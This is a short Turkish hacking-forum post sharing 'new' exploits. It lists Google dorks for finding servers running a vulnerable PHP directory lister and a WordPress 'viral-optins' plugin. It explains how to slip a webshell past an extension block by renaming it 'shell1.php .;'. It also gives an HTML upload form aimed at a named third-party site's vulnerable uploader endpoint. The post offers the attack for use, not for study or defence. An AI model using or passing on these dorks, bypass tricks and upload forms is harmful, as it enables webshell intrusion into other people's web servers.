Upload Buttonu açık exploitler YENİ,GÜNCEL

Meraba arkadaşlar.Bugün sizlerle yepyeni exploitler paylaşacağım.

Meraba arkadaşlar.Bugün sizlerle yepyeni exploitler paylaşacağım.

Google Dork : "dirLIST - PHP Directory Lister" "Banned files: php | php3 | php4 | php5 | htaccess | htpasswd | asp | aspx" "index of" ext:php

Açıklama ve Kullanımı : Example to exploit it using a form in PHP and upload a webshell.
Remember, rename your webshell.
If your webshell is called "shell1.php" rename "shell1.php .;"

Açık : Find vulnerable servers: dirLIST - PHP Directory Lister v0.3.0


Google Dork:
inurl:/wp-content/plugins/viral-optins/

Exploit:
https://site.com/wp-content/plugins/viral-optins/api/uploader/file-uploader.php


<form method="POST" action="http://sitekibrisli.com/wp-content/plugins/viral-optins/api/uploader/file-uploader.php/" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>
 
131,841Konular
3,271,916Mesajlar
316,362Kullanıcılar
kayrasnglSon Üye
Üst Alt